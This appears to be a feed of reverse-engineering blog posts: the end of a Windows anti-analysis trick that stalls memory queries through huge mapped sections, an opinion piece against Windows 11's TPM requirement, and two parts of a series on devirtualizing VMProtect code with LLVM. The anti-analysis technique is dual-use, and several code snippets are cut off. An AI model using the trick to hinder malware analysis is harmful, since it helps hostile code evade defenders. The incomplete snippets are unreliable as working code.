After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
if (!NT_SUCCESS(status))
    return status;

// Personally largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          0x2000, // <- the flag

    if (NT_SUCCESS(status))

Do note that, ideally, you’d need to surround code with these sections because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file without touching anything already existing or creating something visible to the user.


I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Windows 11: TPMs and Digital Sovereignty

28 June 2021 at 00:00

This article is an opinion held by a subset of members about the potential plan from Microsoft about their enforcement of a TPM to use Windows 11 and various features. This article will not go into great detail about all the good and bad of a TPM; there will be links at the end for you to continue your research, but it will go into the issues we see with enforcement. If you’re unfamiliar with what a TPM is or its general function we recommend taking a look at these links: What is a TPM?; TPM and Attestation.

As you may or may not have already noticed, many people are wondering about Microsoft’s new mandatory TPM 2.0 hardware requirement for Windows 11. If you look around the press releases, shallow technical documentation, and the myriad of buzzwords like “security,” “device health,” “firmware vulnerabilities,” and “malware,” you still haven’t received a straightforward answer as to why exactly you need this tech.

Part of system requirements from Microsoft

Many of you reading this article may have machines around the house or office you built from silicon that isn’t even seven years old. These still play today’s latest games without hiccup or issue, and unless you let your Grandma or 6-year old nephew on the machine recently, you likely don’t have malware either.

So, why do I suddenly need a TPM 2.0 device on my machine, then you ask? Well, the answer is quite simple. It’s not about you; it’s about them.

You see, the PC (emphasis on personal here) is in a way the last bastion of digital freedom you have, and that door is slowly closing. You need to only look at highly locked and controlled systems like consoles and phones to see the disparity.

Political affiliations aside, one can take the Wikileaks app removal from both the Apple store and Google play store as an excellent example of what the world looks like when your device controls you, instead of you controlling the device.

How does a TPM on my PC advance this agenda?

Twenty years ago, Microsoft set forth a goal of “trusted” computing called Palladium. While this technical goal has slowly but surely crept into Windows over the years, it has laid chiefly dormant because of critical missing infrastructure. This being that until recently, quite a large majority of consumer machines did not have a TPM, which you’ll learn later is a critical component to making Palladium work. And while we won’t deny that Bitlocker is excellent for if your device ever gets stolen, we will remind you that Microsoft always sold this tyranny to look great on the surface (no pun intended here).

When Palladium debuted, it was shot out of orbit by proponents of free and open software and back into hiding it went.

Comment about vendor withdrawal problem

So why is the TPM useful? The TPM (along with suitable firmware) is critical to measuring the state of your device - the boot state, in particular, to attest to a remote party that your machine is in a non-rooted state. It’s very similar to the Widevine L1 on Android devices; a third-party can then choose whether or not to serve you content. Everything will suddenly revolve around this “trust factor” of your PC. Imagine you want to watch your favorite show on Netflix in 4k, but your hardware trust factor is low? Too bad you’ll have to settle for the 720p stream. Untrusted devices could be watching in an instance of Linux KVM, and we can’t risk your pirating tools running in the background!

You might think that “It’s okay, though! I can emulate a TPM with KVM; the software already exists!” The unfortunate truth is that it’s not that simple. TPMs have unique keys burned in at manufacture time called Endorsement Keys, and these are unique per TPM. These keys are then cryptographically tied to the vendor who issued them, and as such, not only does a TPM uniquely identify your machine anywhere in the world, but content distributors can pick and choose what TPM vendors they want to trust. Sound familiar to you? It’s called Digital Rights Management, otherwise known as DRM.

Let’s not forget, Intel initially shipped the Pentium III with a built-in serial number unique per chip. Much the same initial fate as Palladium, it was also shot down by privacy groups, and the feature was subject to removal.

A common misunderstanding

There seems to be a lot misconceptions floating around in social media. In this section we’ll highlight one of them:

“I can patch the ISO or download one that removes the requirement.”

You can, sure. Windows and a majority of its components will function fine, similar to if you root your phone. Remember the part earlier, though, about 4k video content? That won’t be available to you (as an example). Whether it be a game or a movie, a vendor of consumable media decides what users they trust with their content. Unfortunately, without a TPM, you aren’t cutting it.

You’ve probably noticed that the marketing for this requirement is vague and confusing, and that’s intentional. It doesn’t do much for you, the consumer. However, it does set the stage for the future where Microsoft begins shipping their TPM on your processor. Enter Microsoft’s Pluton. The same technology is present in the Xbox. It would be an absolute dream come true for companies and vendors with special interests to completely own and control your PC to the same degree as a phone or the Xbox.

While the writers of this article will not deny that device attestation can bring excellent security for the standard consumers of the world, we cannot ignore that it opens the door to the restriction of user privacy and freedoms. It also paves the way to have the PC locked into a nice controllable cube for all the citizens to use.

You can see the wood for the trees here. When a company tells you that you need something, and it’s “for your own good,” and hey, they’re just on a humanitarian aid mission to save you from yourself, one should be highly skeptical. Microsoft is pushing this hard; we can even see them citing entirely dubious statistics. We took this one from The Verge:

“Microsoft has been warning for months that firmware attacks are on the rise. “Our Security Signals report found that 83 percent of businesses experienced a firmware attack, and only 29 percent are allocating resources to protect this critical layer,” says Weston.”

If you read into this link, you will find it cites information from Microsoft themselves, called “Security Signals,” and by the time you’re done reading it, you forgot how you got there in the first place. Not only is this statistic not factual, but successful firmware attacks are incredibly rare. Did we mention that a TPM isn’t going to protect you from UEFI malware that was planted on the device by a rogue agent at manufacture time? What about dynamic firmware attacks? Did you know that technologies such as Intel Boot Guard that have existed for the better part of a decade defend well against such attacks that might seek to overwrite flash memory?


We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. It is one step closer to the lockdown of the PC. As Microsoft won the secure boot battle a decade ago, which is where Microsoft became the sole owner of the Secure Boot keys, this move also further tightens the screws on the liberties the PC gives us. While it won’t be evident immediately upon the launch of Windows 11, the pieces are moving together at a much faster pace.

We ask you to do your research in an age of increased restriction of personal freedom, censorship, and endless media propaganda. We strongly encourage you to research Microsoft’s future Pluton chip.

There are links provided below to research for yourself.

Tickling VMProtect with LLVM: Part 2

By: fvrmatteo
8 September 2021 at 23:00

This post will introduce the concepts of expression slicing and partial CFG, combining them to implement an SMT-driven algorithm to explore the virtualized CFG. Finally, some words will be spent on introducing the LLVM optimization pipeline, its configuration and its limitations.

Poor man’s slicer

Slicing a symbolic expression to be able to evaluate it, throw it at an SMT solver or match it against some pattern is something extremely common in all symbolic reasoning tools. Luckily for us this capability is trivial to implement with yet another C++ helper function. This technique has been referred to as Poor man’s slicer in the SATURN paper, hence the title of the section.

In the VMProtect context we are mainly interested in slicing one expression: the next program counter. We want to do that either while exploring the single VmBlocks (that, once connected, form a VmStub) or while exploring the VmStubs (that, once connected, form a VmFunction). The following C++ code is meant to keep only the computations related to the final value of the virtual instruction pointer at the end of a VmBlock or VmStub:

extern "C"
size_t HelperSlicePC(
  size_t rax, size_t rbx, size_t rcx, size_t rdx, size_t rsi,
  size_t rdi, size_t rbp, size_t rsp, size_t r8, size_t r9,
  size_t r10, size_t r11, size_t r12, size_t r13, size_t r14,
  size_t r15, size_t flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    vsp, vip, vmregs, slots);
  // Return the sliced program counter
  return vip;

The acute observer will notice that the function definition is basically identical to the HelperFunction definition given before, with the fundamental difference that the arguments are passed by value and therefore useful if related to the computation of the sliced expression, but with their liveness scope ending at the end of the function, which guarantees that there won’t be store operations to the host context that could possibly bloat the code.

The steps to use the above helper function are:

  • The HelperSlicePC is cloned into a new throwaway function;
  • The call to the HelperStub function is swapped with a call to the VmBlock or VmStub of which we want to slice the final instruction pointer;
  • The called function is forcefully inlined into the HelperSlicePC function;
  • The optimization pipeline is executed on the cloned HelperSlicePC function resulting in the slicing of the final instruction pointer expression as a side-effect of the optimizations.

The following LLVM-IR snippet shows the idea in action, resulting in the final optimized function where the condition and edges of the conditional branch are clearly visible.

define dso_local i64 @HelperSlicePC(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #5 {
  %1 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1) #4, !srcloc !9
  %2 = extractvalue { i32, i32, i32, i32 } %1, 0
  %3 = and i32 %2, 4080
  %4 = icmp eq i32 %3, 4064
  %5 = select i1 %4, i64 5371013457, i64 5371013227
  ret i64 %5

In the following section we’ll see how variations of this technique are used to explore the virtualized control flow graph, solve the conditional branches, and recover the switch cases.


The exploration of a virtualized control flow graph can be done in different ways and usually protectors like VMProtect or Themida show a distinctive shape that can be pattern-matched with ease, simplified and parsed to obtain the outgoing edges of a conditional block.

The logic used by different VMProtect conditional jump versions has been detailed in the past, so in this section we are going to delve into an SMT-driven algorithm based on the incremental construction of the explored control flow graph and specifically built on top of the slicing logic explained in the previous section.

Given the generic nature of the detailed algorithm, nothing stops it from being used on other protectors. The usual catch is obviously caused by protections embedding hard to solve constraints that may hinder the automated solving phase, but the construction and propagation of the partial CFG constraints and expressions could still be useful in practice to pull out less automated exploration algorithms, or to identify and simplify anti-dynamic symbolic execution tricks (e.g. dummy loops leading to path explosion that could be simplified by LLVM’s loop optimization passes or custom user passes).

Partial CFG

A partial control flow graph is a control flow graph built connecting the currently explored basic blocks given the known edges between them. The idea behind building it, is that each time that we explore a new basic block, we gather new outgoing edges that could lead to new unexplored basic blocks, or even to known basic blocks. Every new edge between two blocks is therefore adding information to the entire control flow graph and we could actually propagate new useful constraints and values to enable stronger optimizations, possibly easing the solving of the conditional branches or even changing a known branch from unconditional to conditional.

Let’s look at two motivating examples of why building a partial CFG may be a good idea to be able to replicate the kind of reasoning usually implemented by symbolic execution tools, with the addition of useful built-in LLVM passes.

Motivating example #1

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlock and purple the VmBlock of interest for the example.

Motivating example 1

Let’s assume we just solved the outgoing edges for the basic block A, obtaining two connections leading to the new basic blocks B and C. Now assume that we sliced the branch condition of the sole basic block B, obtaining an access into a constant array with a 64 bits symbolic index. Enumerating all the valid indices may be a non-trivial task, so we may want to restrict the search using known constraints on the symbolic index that, if present, are most likely going to come from the chain(s) of predecessor(s) of the basic block B.

To draw a symbolic execution parallel, this is the case where we want to collect the path constraints from a certain number of predecessors (e.g. we may want to incrementally harvest the constraints, because sometimes the needed constraint is locally near to the basic block we are solving) and chain them to be fed to an SMT solver to execute a successful enumeration of the valid indices.

Tools like Souper automatically harvest the set of path constraints while slicing an expression, so building the partial control flow graph and feeding it to Souper may be sufficient for the task. Additionally, with the LLVM API to walk the predecessors of a basic block it’s also quite easy to obtain the set of needed constraints and, when available, we may also take advantage of known-to-be-true conditions provided by the llvm.assume intrinsic.

Motivating example #2

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlocks, purple the VmBlock of interest for the example, dashed red arrows the edges of interest for the example and the solid green arrow an edge that has just been processed.

Motivating example 2

Let’s assume we just solved the outgoing edges for the basic block E, obtaining two connections leading to a new block G and a known block B. In this case we know that we detected a jump to the previously visited block B (edge in green), which is basically forming a loop chain (BCEB) and we know that starting from B we can reach two edges (BC and DF, marked in dashed red) that are currently known as unconditional, but that, given the newly obtained edge EB, may not be anymore and therefore will need to be proved again. Building a new partial control flow graph including all the newly discovered basic block connections and slicing the branch of the blocks B and D may now show them as conditional.

As a real world case, when dealing with concolic execution approaches, the one mentioned above is the usual pattern that arises with index-based loops, starting with a known concrete index and running till the index reaches an upper or lower bound N. During the first N-1 executions the tool would take the same path and only at the iteration N the other path would be explored. That’s the reason why concolic and symbolic execution tools attempt to build heuristics or use techniques like state-merging to avoid running into path explosion issues (or at best executing the loop N times).

Building the partial CFG with LLVM instead, would mark the loop back edge as unconditional the first time, but building it again, including the knowledge of the newly discovered back edge, would immediately reveal the loop pattern. The outcome is that LLVM would now be able to apply its loop analysis passes, the user would be able to use the API to build ad-hoc LoopPass passes to handle special obfuscation applied to the loop components (e.g. encoded loop variant/invariant) or the SMT solvers would be able to treat newly created Phi nodes at the merge points as symbolic variables.

The following LLVM-IR snippet shows the sliced partial control flow graphs obtained during the exploration of the virtualized assembly snippet presented below.

  mov rax, 2000
  mov rbx, 0
  inc rbx
  cmp rbx, rax
  jne loop

The original assembly snippet.

define dso_local i64 @FirstSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = call i64 @HelperKeepPC(i64 5369464257)
  ret i64 %1

The first partial CFG obtained during the exploration phase

define dso_local i64 @SecondSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  %5 = select i1 %4, i64 5369183207, i64 5369464257
  %6 = call i64 @HelperKeepPC(i64 %5)
  %7 = icmp eq i64 %6, 5369464257
  br i1 %7, label %1, label %8

8:                                                ; preds = %1
  ret i64 233496237

The second partial CFG obtained during the exploration phase. The block 8 is returning the dummy 0xdeaddead (233496237) value, meaning that the VmBlock instructions haven’t been lifted yet.

define dso_local i64 @F_0x14000101f_NoLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  br i1 %4, label %5, label %1

5:                                                ; preds = %1
  store i64 %3, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281

The final CFG obtained at the completion of the exploration phase.

define dso_local i64 @F_0x14000101f_WithLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  store i64 2000, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281

The loop-optimized final CFG obtained at the completion of the exploration phase.

The FirstSlice function shows that a single unconditional branch has been detected, identifying the bytecode address 0x1400B85C1 (5369464257), this is because there’s no knowledge of the back edge and the comparison would be cmp 1, 2000. The SecondSlice function instead shows that a conditional branch has been detected selecting between the bytecode addresses 0x140073BE7 (5369183207) and 0x1400B85C1 (5369464257). The comparison is now done with a symbolic PHINode. The F_0x14000101f_WithLoopOpt and F_0x14000101f_NoLoopOpt functions show the fully devirtualized code with and without loop optimizations applied.


Given the knowledge obtained from the motivating examples, the pseudocode for the automated partial CFG driven exploration is the following:

  1. We initialize the algorithm creating:

    • A stack of addresses of VmBlocks to explore, referred to as Worklist;
    • A set of addresses of explored VmBlocks, referred to as Explored;
    • A set of addresses of VmBlocks to reprove, referred to as Reprove;
    • A map of known edges between the VmBlocks, referred to as Edges.
  2. We push the address of the entry VmBlock into the Worklist;
  3. We fetch the address of a VmBlock to explore, we lift it to LLVM-IR if met for the first time, we build the partial CFG using the knowledge from the Edges map and we slice the branch condition of the current VmBlock. Finally we feed the branch condition to Souper, which will process the expression harvesting the needed constraints and converting it to an SMT query. We can then send the query to an SMT solver, asking for the valid solutions, incrementally rejecting the known solutions up to some limit (worst case) or till all the solutions have been found.
  4. Once we obtained the outgoing edges for the current VmBlock, we can proceed with updating the maps and sets:

    • We verify if each solved edge is leading to a known VmBlock; if it is, we verify if this connection was previously known. If unknown, it means we found a new predecessor for a known VmBlock and we proceed with adding the addresses of all the VmBlocks reachable by the known VmBlock to the Reprove set and removing them from the Explored set; to speed things up, we can eventually skip each VmBlock known to be firmly unconditional;
    • We update the Edges map with the newly solved edges.
  5. At this point we check if the Worklist is empty. If it isn’t, we jump back to step 3. If it is, we populate it with all the addresses in the Reprove set, clearing it in the process and jumping back to step 3. If also the Reprove set is empty, it means we explored the whole CFG and eventually reproved all the VmBlocks that obtained new predecessors during the exploration phase.

As mentioned at the start of the section, there are many ways to explore a virtualized CFG and using an SMT-driven solution may generalize most of the steps. Obviously, it brings its own set of issues (e.g. hard to solve constraints), so one could eventually fall back to the pattern matching based solution at need. As expected, the pattern matching based solution would also blindly explore unreachable paths at times, so a mixed solution could really offer the best CFG coverage.

The pseudocode presented in this section is a simplified version of the partial CFG based exploration algorithm used by SATURN at this point in time, streamlined from a set of reasonings that are unnecessary while exploring a CFG virtualized by VMProtect.


So far we hinted at the underlying usage of LLVM’s optimization and analysis passes multiple times through the sections, so we can finally take a look at: how they fit in, their configuration and their limitations.

Managing the pipeline

Running the whole -O3 pipeline may not always be the best idea, because we may want to use only a subset of passes, instead of wasting cycles on passes that we know a priori don’t have any effect on the lifted LLVM-IR code. Additionally, by default, LLVM is providing a chain of optimizations which is executed once, is meant to optimize non-obfuscated code and should be as efficient as possible.

Although, in our case, we have different needs and want to be able to:

  • Add some custom passes to tackle context-specific problems and do so at precise points in the pipeline to obtain the best possible output, while avoiding phase ordering issues;
  • Iterate the optimization pipeline more than once, ideally until our custom passes can’t apply any more changes to the IR code;
  • Be able to pass custom flags to the pipeline to toggle some passes at will and eventually feed them with information obtained from the binary (e.g. access to the binary sections).

LLVM provides a FunctionPassManager class to craft our own pipeline, using LLVM’s passes and custom passes. The following C++ snippet shows how we can add a mix of passes that will be executed in order until there won’t be any more changes or until a threshold will be reached:

void optimizeFunction(llvm::Function *F, OptimizationGuide &G) {
  // Fetch the Module
  auto *M = F->getParent();
  // Create the function pass manager
  llvm::legacy::FunctionPassManager FPM(M);
  // Initialize the pipeline
  llvm::PassManagerBuilder PMB;
  PMB.OptLevel = 3;
  PMB.SizeLevel = 2;
  PMB.RerollLoops = false;
  PMB.SLPVectorize = false;
  PMB.LoopVectorize = false;
  PMB.Inliner = createFunctionInliningPass();
  // Add the alias analysis passes
  // Add some useful LLVM passes
  // Add a custom pass here
  if (G.RunCustomPass1)
  // Add a custom pass here
  if (G.RunCustomPass2)
  // Execute the pipeline
  size_t minInsCount = F->getInstructionCount();
  size_t pipExeCount = 0;
  do {
    // Reset the IR changed flag
    G.HasChanged = false;
    // Run the optimizations*F);
    // Check if the function changed
    size_t curInsCount = F->getInstructionCount();
    if (curInsCount < minInsCount) {
      minInsCount = curInsCount;
      G.HasChanged |= true;
    // Increment the execution count
  } while (G.HasChanged && pipExeCount < 5);

The OptimizationGuide structure can be used to pass information to the custom passes and control the execution of the pipeline.


As previously stated, the LLVM default pipeline is meant to be as efficient as possible, therefore it’s configured with a tradeoff between efficiency and efficacy in mind. While devirtualizing big functions it’s not uncommon to see the effects of the stricter configurations employed by default. But an example is worth a thousand words.

In the Godbolt UI we can see on the left a snippet of LLVM-IR code that is storing i32 values at increasing indices of a global array named arr. The store at line 96, writing the value 91 at arr[1], is a bit special because it is fully overwriting the store at line 6, writing the value 1 at arr[1]. If we look at the upper right result, we see that the DSE pass was applied, but somehow it didn’t do its job of removing the dead store at line 6. If we look at the bottom right result instead, we see that the DSE pass managed to achieve its goal and successfully killed the dead store at line 6. The reason for the difference is entirely associated to a conservative configuration of the DSE pass, which by default (at the time of writing), is walking up to 90 MemorySSA definitions before deciding that a store is not killing another post-dominated store. Setting the MemorySSAUpwardsStepLimit to a higher value (e.g. 100 in the example) is definitely something that we want to do while deobfuscating some code.

Each pass that we are going to add to the custom pipeline is going to have configurations that may be giving suboptimal deobfuscation results, so it’s a good idea to check their C++ implementation and figure out if tweaking some of the options may improve the output.


When tweaking some configurations is not giving the expected results, we may have to dig deeper into the implementation of a pass to understand if something is hindering its job, or roll up our sleeves and develop a custom LLVM pass. Some examples on why digging into a pass implementation may lead to fruitful improvements follow.

IsGuaranteedLoopInvariant (DSE, MSSA)

While looking at some devirtualized code, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diffs: D96979, D97155. The bottom line is that the IsGuarenteedLoopInvariant function used by the DSE and MSSA passes was not using the safe assumption that a pointer computed in the entry block is, by design, guaranteed to be loop invariant as the entry block of a Function is guaranteed to have no predecessors and not to be part of a loop.

GetPointerBaseWithConstantOffset (DSE)

While looking at some devirtualized code that was accessing memory slots of different sizes, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diff: D97676. The bottom line is that while computing the partially overlapping memory stores, the DSE was considering only memory slots with the same base address, ignoring fully overlapping stores offsetted between each other. The solution is making use of another patch which is providing information about the offsets of the memory slots: D93529.

Shift-Select folding (InstCombine)

And obviously there is no two without three! Nah, just kidding, a patch I wanted to get accepted to simplify one of the recurring patterns in the computation of the VMProtect conditional branches has been on pause because InstCombine is an extremely complex piece of code and additions to it, especially if related to uncommon patterns, are unwelcome and seen as possibly bloating and slowing down the entire pipeline. Additional information on the pattern and the reasons that hinder its folding are available in the following differential: D84664. Nothing stops us from maintaining our own version of InstCombine as a custom pass, with ad-hoc patterns specifically selected for the obfuscation under analysis.

What’s next?

In Part 3 we’ll have a look at a list of custom passes necessary to reach a superior output quality. Then, some words will be spent on the handling of the unsupported instructions and on the recompilation process. Last but not least, the output of 6 devirtualized functions, with varying code constructs, will be shown.

Tickling VMProtect with LLVM: Part 3

By: fvrmatteo
8 September 2021 at 23:00

This post will introduce 7 custom passes that, once added to the optimization pipeline, will make the overall LLVM-IR output more readable. Some words will be spent on the unsupported instructions lifting and recompilation topics. Finally, the output of 6 devirtualized functions will be shown.

Custom passes

This section will give an overview of some custom passes meant to:

  • Solve VMProtect specific optimization problems;
  • Solve some limitations of existing LLVM passes, but that won’t meet the same quality standard of an official LLVM pass.


This pass falls under the category of the VMProtect specific optimization problems and is probably the most delicate of the section, as it may be feeding LLVM with unsafe assumptions. The aliasing information described in the Liveness and aliasing information section will finally come in handy. In fact, the goal of the pass is to identify the type of two pointers and determine if they can be deemed as not aliasing with one another.

With the structures defined in the previous sections, LLVM is already able to infer that two pointers derived from the following sources don’t alias with one another:

  • general purpose registers
  • VmRegisters
  • VmPassingSlots
  • GS zero-sized array
  • FS zero-sized array
  • RAM zero-sized array (with constant index)
  • RAM zero-sized array (with symbolic index)

Additionally LLVM can also discern between pointers with RAM base using a simple symbolic index. For example an access to [rsp - 0x10] (local stack slot) will be considered as NoAlias when compared with an access to [rsp + 0x10] (incoming stack argument).

But LLVM’s alias analysis passes fall short when handling pointers using as base the RAM array and employing a more convoluted symbolic index, and the reason for the shortcoming is entirely related to the lack of type and context information that got lost during the compilation to binary.

The pass is inspired by existing implementations (1, 2, 3) that are basing their checks on the identification of pointers belonging to different segments and address spaces.

Slicing the symbolic index used in a RAM array access we can discern with high confidence between the following additional NoAlias memory accesses:

  • indirect access: if the access is a stack argument ([rsp] or [rsp + positive_constant_offset + symbolic_offset]), a dereferenced general purpose register ([rax]) or a nested dereference (val1 = [rax], val2 = [val1]); identified as TyIND in the code;
  • local stack slot: if the access is of the form [rsp - positive_constant_offset + symbolic_offset]; identified as TySS in the code;
  • local stack array: if the access if of the form [rsp - positive_constant_offset + phi_index]; identified as TyARR in the code.

If the pointer type cannot be reliably detected, an unknown type (identified as TyUNK in the code) is being used, and the comparison between the pointers is automatically skipped. If the pass cannot return a NoAlias result, the query is passed back to the default alias analysis pipeline.

One could argue that the pass is not really needed, as it is unlikely that the propagation of the sensitive information we need to successfully explore the virtualized CFG is hindered by aliasing issues. In fact, the computation of a conditional branch at the end of a VmBlock is guaranteed not to be hindered by a symbolic memory store happening before the jump VmHandler accesses the branch destination. But there are some cases where VMProtect pushes the address of the next VmStub in one of the first VmBlocks, doing memory stores in between and accessing the pushed value only in one or more VmExits. That could be a case where discerning between a local stack slot and an indirect access enables the propagation of the pushed address.

Irregardless of the aforementioned issue, that can be solved with some ad-hoc store-to-load detection logic, playing around with the alias analysis information that can be fed to LLVM could make the devirtualized code more readable. We have to keep in mind that there may be edge cases where the original code is breaking our assumptions, so having at least a vague idea of the involved pointers accessed at runtime could give us more confidence or force us to err on the safe side, relying solely on the built-in LLVM alias analysis passes.

The assembly snippet shown below has been devirtualized with and without adding the SegmentsAA pass to the pipeline. If we are sure that at runtime, before the push rax instruction, rcx doesn’t contain the value rsp - 8 (extremely unexpected on benign code), we can safely enable the SegmentsAA pass and obtain a cleaner output.

  push rax
  mov qword ptr [rsp], 1
  mov qword ptr [rcx], 2
  pop rax

The assembly code writing to two possibly aliasing memory slots

define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rcx, align 8, !alias.scope !22, !noalias !27
  %2 = inttoptr i64 %1 to i64*
  store i64 2, i64* %2, align 1, !noalias !65
  store i64 1, i64* %rax, align 8, !tbaa !4, !alias.scope !66, !noalias !67
  ret i64 5368713278

The devirtualized code with the SegmentsAA pass added to the pipeline, with the assumption that rcx differs from rsp - 8

